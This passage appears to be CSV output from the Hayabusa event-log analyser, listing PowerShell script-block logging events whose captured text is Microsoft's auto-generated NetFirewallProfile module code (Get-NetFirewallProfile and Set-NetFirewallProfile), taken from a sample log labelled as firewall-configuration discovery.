)) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { 
[object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] 
} if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
